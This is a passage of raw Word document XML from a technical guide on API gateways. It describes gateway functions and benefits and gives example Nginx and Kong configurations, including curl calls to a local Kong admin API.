          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Controls the rate of requests from clients to prevent abuse and ensure fair usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C2DC09" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="316"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Caching</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15804E04" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="316"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Stores frequently requested data to reduce load on backend services and improve response times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763DB5F5" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="316"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Request and Response Transformation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387A7549" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="316"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Modifies incoming requests or outgoing responses to meet specific requirements or formats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF23FF8" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="316"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Logging and Monitoring</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048CEDC1" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="316"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Records requests and responses for auditing and monitoring purposes, helping in debugging and performance tracking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D89C4BB" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="316"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194CF594" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="316"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Distributes incoming requests across multiple instances of a microservice to balance the load and improve scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3875F8B8" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Benefits of Using an API Gateway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D38F66" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="317"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Simplified Client Interactions</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F310CC0" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="317"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Clients interact with a single API gateway rather than multiple microservices, simplifying the client-side logic and reducing the number of connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C313A4" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="317"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Centralized Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D55804" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="317"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Provides a central place for managing security, logging, and monitoring, which can be more efficient than handling these aspects in each microservice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109E5857" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="317"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Improved Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AFAEA4" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="317"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Handles security concerns such as authentication, authorization, and SSL termination in one place, enhancing overall security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCB836C" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="317"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Performance Optimization</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7DA8C4" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="317"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Features like caching and request aggregation can improve performance by reducing the load on backend services and decreasing response times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C03B92" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="317"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Decoupling</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BA3E1D" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="317"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Decouples clients from microservices, allowing backend services to change without affecting the client application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60ED8B91" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="317"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Flexibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141019E4" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="317"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Allows for the implementation of various cross-cutting concerns (e.g., logging, monitoring) in one place, rather than in every microservice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BDECA3" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Common API Gateway Solutions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392BF485" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="318"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Nginx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66505AD8"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Nginx can be used as an API gateway by configuring it to route requests to backend services and handle features like load balancing and caching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BA0A14"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High-performance, open-source scenarios with extensive support for various features.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0321738A" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example Configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C272DA6"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http {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060F2CC6"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upstream backend {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3557F6"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server backend1:5000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7C3C68"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server backend2:5000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15261290"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A2DB4D"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p>
    <w:p w14:paraId="32C413A2"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server {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2731EEAB"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listen 80;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419DCE2B"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p>
    <w:p w14:paraId="5DFB1C5D"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location /api/ {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057C0656"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proxy_pass http://backend;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020BCFF6"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A35C51F"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BD7E4F2"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476E89D" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="318"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Kong</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C69A91"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Kong is an open-source API gateway and microservices management layer that provides features such as load balancing, authentication, and rate limiting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2463BF"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Scalable and extensible solutions with a rich set of plugins for various features.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551383A2" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example Configuration with Plugin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CBB509"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curl -X POST http://localhost:8001/services/ \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36ECC907"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--data "name=my-service" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E8D235"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--data "url=http://my-backend:5000"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D50BBA" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="222FBB8F"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curl -X POST http://localhost:8001/services/my-service/routes \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3B2063"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--data "paths[]=/api"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23563BBA" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E3E062B"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curl -X POST http://localhost:8001/services/my-service/plugins \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7F70EA"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--data "name=rate-limiting" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701BC448"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--data "config.minute=60"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7445E0FC" w14:textId="77777777" w:rsidR="004921A7" w:rsidRPr="00DA2F32" w:rsidRDefault="004921A7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="318"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
